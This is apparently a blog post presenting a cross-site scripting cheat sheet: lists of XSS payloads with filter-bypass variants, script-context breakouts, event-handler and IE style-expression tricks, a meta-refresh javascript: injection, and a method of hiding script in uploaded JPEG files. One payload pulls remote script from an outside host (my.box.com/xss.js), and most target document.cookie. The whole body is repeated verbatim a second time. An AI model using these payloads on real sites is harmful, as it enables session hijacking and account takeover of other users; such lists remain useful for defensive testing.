XSS Cheat Sheet
The basic:
“><script >alert(document.cookie)</script>
Bypass filter when it strips <script> tags:
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
When inside <script> tags:
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
Other XSS that don’t require <script>:
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
On IE, many tags will accept a style attribute that one could do things with:
http://www.site.com?image=s%22%20style=x:expression(alert(document.cookie))
http://www.site.com?image=s%22%20style=%22background:url(javascript:alert(’XSS’))
http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29
In FF if you control the content attribute of a refresh meta tag, you can inject a URL that uses the javascript: protocol:
http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>
XSS in JPEGs:
Don’t forget if a user requests a JPEG file in IE directly (not through an embedded <img> tag), then IE will process the contents as HTML if that is what the JPEG contains. This means that we can upload a file with a .jpg extension containing a XSS payload. This works nicely when we have an application that has functionality to upload images and then gets viewed by others. This is common in web mail applications, where one can send an email containing an image attachment, etc. Many applications sanitize HTML attachments to block XSS attacks, but overlook the way IE handles JPEG files.
Example:
HTTP/1.1 200 OK
Date: Sun, 6 May 2007 11:32:35 GMT
Server: Apache
Content-Length: 39
Content-Type: image/jpeg
<script>alert(document.cookie)</script>
“><script >alert(document.cookie)</script>
Bypass filter when it strips <script> tags:
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
When inside <script> tags:
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
Other XSS that don’t require <script>:
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
On IE, many tags will accept a style attribute that one could do things with:
http://www.site.com?image=s%22%20style=x:expression(alert(document.cookie))
http://www.site.com?image=s%22%20style=%22background:url(javascript:alert(’XSS’))
http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29
In FF if you control the content attribute of a refresh meta tag, you can inject a URL that uses the javascript: protocol:
http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>
XSS in JPEGs:
Don’t forget if a user requests a JPEG file in IE directly (not through an embedded <img> tag), then IE will process the contents as HTML if that is what the JPEG contains. This means that we can upload a file with a .jpg extension containing a XSS payload. This works nicely when we have an application that has functionality to upload images and then gets viewed by others. This is common in web mail applications, where one can send an email containing an image attachment, etc. Many applications sanitize HTML attachments to block XSS attacks, but overlook the way IE handles JPEG files.
Example:
HTTP/1.1 200 OK
Date: Sun, 6 May 2007 11:32:35 GMT
Server: Apache
Content-Length: 39
Content-Type: image/jpeg
<script>alert(document.cookie)</script>
0 comments:
Post a Comment